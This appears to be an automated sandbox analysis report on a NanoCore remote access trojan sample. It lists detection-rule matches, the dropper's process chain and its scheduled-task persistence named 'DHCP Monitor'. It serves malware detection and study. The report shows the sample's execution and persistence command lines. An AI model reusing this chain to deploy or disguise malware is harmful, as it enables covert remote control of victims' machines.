Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

7_2_002BF122

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096EB78 appears 39 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096EC50 appears 56 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: String function: 0026FD60 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: String function: 00270DC0 appears 46 times

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_00956FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00956FAA

Source: P05jmXYKpr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/36@16/2

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_00956C74 GetLastError,FormatMessageW,

0_2_00956C74

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0096A6C2

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: P05jmXYKpr.exe	ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File read: C:\Users\user\Desktop\P05jmXYKpr.exe

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\P05jmXYKpr.exe C:\Users\user\Desktop\P05jmXYKpr.exe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp	Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B194F AdjustTokenPrivileges,CloseHandle,		7_2_002B194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		7_2_002B1F53

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002D4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

7_2_002D4089

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002C5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

7_2_002C5B27

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

7_2_002BDC9C

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{72ec1ea3-16bf-4e76-a7cf-15ed5e2a0279}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_01

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: sfxname	0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: sfxstime	0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: STARTDLG	0_2_0096DF1E

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File written: C:\Users\user\AppData\Local\Temp\RarSFX0\nibh.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: P05jmXYKpr.exe

Static file information: File size 1115860 > 1048576

Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: P05jmXYKpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: P05jmXYKpr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
